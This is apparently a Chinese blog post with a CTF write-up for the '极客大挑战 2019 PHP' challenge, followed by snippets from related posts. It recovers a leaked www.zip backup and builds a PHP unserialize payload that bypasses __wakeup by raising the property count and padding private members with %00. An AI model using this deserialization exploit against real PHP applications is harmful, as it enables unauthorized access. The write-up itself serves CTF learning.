[极客大挑战 2019]PHP

于 2023-03-05 17:02:49 发布
阅读量198 收藏
点赞数 1
文章标签: php 开发语言 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fcz___/article/details/129346773
版权

打开靶机
在这里插入图片描述
我们的右键是不能用的。我们按f12打开查看器,
在这里插入图片描述
把蓝色那一部分删掉,再右键查看源代码。
在这里插入图片描述
好,没有什么有用的信息。既然他提示我们备份文件,那我们就dirsearch扫描一下目录。
请添加图片描述
可以看到有一个www.zip。我们访问下载。
在这里插入图片描述
可以看到有一个flag.php。很可惜是假的。我们打开index.php。
在这里插入图片描述
发现里面有一串php代码。是一个反序列化函数。还说包含了一个class.php。我们查看class.php
在这里插入图片描述
大概意思是说以get方式上传一个select,内容是password=100,username=admin的反序列化。当然还得绕过 __wakeup()函数。


<?php

class Name
{
    private $username;
    private $password;

    public function __construct($username,$password)
    {
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin',100);
var_dump(serialize($a));

?>

这是我从别人那里偷了一段代码。下次用的时候改一下数值就行。我们找一个php在线网站跑一下。
在这里插入图片描述
就是这样:O:4:“Name”:2:{s:14:“Nameusername”;s:5:“admin”;s:14:“Namepassword”;i:100;}
当成员属性数目大于真是数目时会绕过 __wakeup()函数。也就是说把Name后面的2改为一个大于2的值。这里我们改为3。、
在这里插入图片描述
然后我们发现不行。然后看了一下才知道用序列化加%00\n在序列化时,Public属性序列化后格式:成员名,Private属性序列化后格式:%00类名%00成员名,Protected属性序列化后的格式:%00*%00成员名。\n但是在对序列化后的数据直接进行复制时会丢失 %00 所以我们对其手动补全,并更改成员属性数目使其大于实际数目那我们就加%00

select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述
出来了。

寡人略秀
关注
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5626
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 719
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
极客挑战 2019 PHP
BlueDoorZz的博客
07-12 512
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 370
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
buuctf-web-[极客挑战 2019]PHP1
mlws1900的博客
09-22 552
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。观察代码,发现需要username=admin,password=100才能获取flag。但是反序列化时会先运行__wakeup函数,对username赋值guest,需要绕过。打开环境,发现提示有备份文件,用dirsearch扫一遍,获得备份文件。index.php文件内容发现传参地址,对select进行传参。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值